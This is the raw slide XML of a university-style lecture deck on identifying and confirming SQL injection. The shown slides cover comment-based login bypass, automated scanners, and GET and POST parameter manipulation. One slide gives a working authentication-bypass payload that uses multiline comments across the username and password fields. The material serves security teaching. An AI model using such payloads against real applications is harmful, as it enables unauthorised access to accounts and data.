          <a:xfrm>
            <a:off x="1676400" y="990600"/>
            <a:ext cx="8839200" cy="5638800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>You may find scenarios where a double hyphen (--) cannot be used because it is filtered by the application or because commenting out the rest of the query generates errors. In such cases, you can use multiline comments (/∗∗/) for commenting parts of the SQL statement. This technique requires more than one vulnerable parameter and an understanding of the position of the parameters in the SQL statement.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>In this attack, we use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>Username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> field to select the user we want and start the comment with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/∗</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>. In the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> field we finish the comment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>∗/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> and add a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>single-quote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> to end the statement:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT ∗ FROM administrators</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE username = ‘admin’/∗‘ AND password = ’∗/ ’’;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>This is equivalent to:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT ∗ FROM administrators</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE username = ‘admin’’’;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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1599930"/>
            <a:ext cx="8664498" cy="2667000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>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8686800" cy="715962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0"/>
              <a:t>Tools for Automatically Finding SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="1143000"/>
            <a:ext cx="8610600" cy="5562600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>WebInspect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: a commercial tool by HP. Although you can use it as a SQL injection discovery tool, the real purpose of this tool is to conduct a full assessment of the security of a Web site. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>AppScan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: a commercial tool by IBM used for assessing the security of a Web site, which includes SQL injection assessment.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Acunetix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: web vulnerability scanner</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>w3af: web application attack and audit framework</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Scrawlr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: a free tool by HP (but with limited functionality).</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>SQLiX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: a free tool coded by Cedric Cochin (in Perl).</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>SQLBrute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: a free tool coded by Justin Clark (in Python)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Paros Proxy (now commercial), then the outshoot ZAP (Zed Attack Proxy): a good candidate among the free software alternatives.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>WebGoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: a deliberately insecure platform for learning web application security (including SQL injection)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>To test these tools, you can use some of the web applications available for testing purposes (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>BodgeIt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> available in Google Code)</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1000"/>
            <a:ext cx="8534400" cy="792162"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" dirty="0"/>
              <a:t>Understanding HTTP Requests</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="1371600"/>
            <a:ext cx="8686800" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>Web environments are an example of client/server architecture. Your browser (acting as a client) sends a request to the server and waits for a response. The understanding of both parties is ensured by the use of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" i="1" dirty="0"/>
              <a:t>protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>; in this case, HTTP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>HTTP defines a number of actions that a client can send to the server; but we will focus on the two most relevant ones for the purpose of discovering SQL injection: the GET and POST  methods.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>GET Requests</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="990600"/>
            <a:ext cx="8839200" cy="5638800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> is an HTTP method that requests the server whatever information is indicated in the URL. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>This is the kind of method that is normally used when you click on a link. The Web browser creates the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> request, sends it to the Web server, and renders the response in the browser. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>This request sends parameters in the URL as follows:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?parameter1=value1&amp;parameter2=value2&amp;parameter3=value3…</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The remote application will retrieve the values of the parameters and use them for whatever purpose they have been designed. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>You can manipulate these parameters by changing them in your browser’s navigation toolbar. Alternatively, you can use a proxy tool.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="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639762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" dirty="0"/>
              <a:t>POST Requests</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="914400"/>
            <a:ext cx="8839200" cy="5791200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> is an HTTP method used to send information to the Web server. This is normally the method used when you fill in a form in your browser and click the Submit button. The values are sent in the HTTP body and are not visible in the URL.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Is POST, therefore, safer than GET? Only up to a point! </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Keep one thing in mind: you may put in place some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>client side mechanisms </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>such as</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hidden fields </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>within the form, </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>drop-down fields </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>with a set of choices; </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>size limits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> on input boxes…</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>     All of these </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>client side restrictions can be bypassed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Browser plugins (e.g., Firefox Tamper Data or SQL Inject Me)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Proxy servers (e.g., Paros Proxy, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>WebScarab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, Burp Suite)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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49345</Words>
  <Application>WPS Presentation</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>690</Paragraphs>
  <Slides>63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63</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="73" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>SimSun</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Microsoft YaHei</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Wisp</vt:lpstr>
      <vt:lpstr>SQL Injection: Identifying and confirming SQL injection vulnerabilities</vt:lpstr>
      <vt:lpstr>Warning!</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Understanding How Web Applications Work</vt:lpstr>
      <vt:lpstr>Understanding How Web Applications Work</vt:lpstr>
      <vt:lpstr>Understanding HTTP Requests</vt:lpstr>
      <vt:lpstr>GET Requests</vt:lpstr>
      <vt:lpstr>POST Requests</vt:lpstr>
      <vt:lpstr>Dynamic SQL Statements</vt:lpstr>
      <vt:lpstr>Note before we start: Differentiating Numbers and Strings</vt:lpstr>
      <vt:lpstr>Understanding SQL Injection – Example </vt:lpstr>
      <vt:lpstr>Understanding SQL Injection – Example 1</vt:lpstr>
      <vt:lpstr>Understanding SQL Injection – Example 2</vt:lpstr>
      <vt:lpstr>Understanding SQL Injection – Example 2</vt:lpstr>
      <vt:lpstr>SQL injection vulnerabilities</vt:lpstr>
      <vt:lpstr>Incorrectly Handled Escape Characters - Vulnerability</vt:lpstr>
      <vt:lpstr>Incorrectly Handled Escape Characters - Exploitation</vt:lpstr>
      <vt:lpstr>Incorrectly Handled Types - Vulnerability</vt:lpstr>
      <vt:lpstr>Incorrectly Handled Types - Exploitation</vt:lpstr>
      <vt:lpstr>Incorrectly Handled Query Assembly - Vulnerability</vt:lpstr>
      <vt:lpstr>Incorrectly Handled Query Assembly - Exploitation</vt:lpstr>
      <vt:lpstr>Incorrectly Handled Errors - Vulnerability</vt:lpstr>
      <vt:lpstr>Incorrectly Handled Errors - Exploitation</vt:lpstr>
      <vt:lpstr>Incorrectly Handled Multiple Submissions</vt:lpstr>
      <vt:lpstr>Insecure Database Configuration</vt:lpstr>
      <vt:lpstr>Insecure Database Configuration</vt:lpstr>
      <vt:lpstr>Insecure Database Configuration</vt:lpstr>
      <vt:lpstr>Insecure Database Configuration</vt:lpstr>
      <vt:lpstr>Identifying SQL Injection Vulnerabilities</vt:lpstr>
      <vt:lpstr>Inferential Testing for Locating SQL Injection Vulnerabilities</vt:lpstr>
      <vt:lpstr>Manipulating Parameters</vt:lpstr>
      <vt:lpstr>Manipulating Parameters</vt:lpstr>
      <vt:lpstr>Manipulating Parameters</vt:lpstr>
      <vt:lpstr>Information Workflow with Database Errors</vt:lpstr>
      <vt:lpstr>Microsoft SQL Server Errors</vt:lpstr>
      <vt:lpstr>Microsoft SQL Server Errors</vt:lpstr>
      <vt:lpstr>Microsoft SQL Server Errors</vt:lpstr>
      <vt:lpstr>Microsoft SQL Server Errors</vt:lpstr>
      <vt:lpstr>Microsoft SQL Server Errors</vt:lpstr>
      <vt:lpstr>Microsoft SQL Server Errors</vt:lpstr>
      <vt:lpstr>MySQL Errors</vt:lpstr>
      <vt:lpstr>MySQL Errors</vt:lpstr>
      <vt:lpstr>Oracle Errors</vt:lpstr>
      <vt:lpstr>Application Response</vt:lpstr>
      <vt:lpstr>Generic Errors</vt:lpstr>
      <vt:lpstr>Generic Errors</vt:lpstr>
      <vt:lpstr>Generic Errors</vt:lpstr>
      <vt:lpstr>HTTP Error Codes</vt:lpstr>
      <vt:lpstr>Blind Injection Detection</vt:lpstr>
      <vt:lpstr>Confirming SQL Injection</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Inline SQL Injection</vt:lpstr>
      <vt:lpstr>Injecting Strings Inline</vt:lpstr>
      <vt:lpstr>Injecting Strings Inline</vt:lpstr>
      <vt:lpstr>Injecting Strings Inline</vt:lpstr>
      <vt:lpstr>Injecting Numeric Values Inline</vt:lpstr>
      <vt:lpstr>Tip</vt:lpstr>
      <vt:lpstr>Terminating SQL Injection</vt:lpstr>
      <vt:lpstr>Using Comments</vt:lpstr>
      <vt:lpstr>Using Comments</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Tools for Automatically Finding SQL Injection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Injection</dc:title>
  <dc:creator>Hatem Ahriz (csdm)</dc:creator>
  <cp:lastModifiedBy>iorfa</cp:lastModifiedBy>
  <cp:revision>216</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-31T11:29:23Z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4FEFA936B86F4E1BBC5AB90A33D82367_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2057-12.2.0.17153</vt:lpwstr>
  </property>
</Properties>
</file>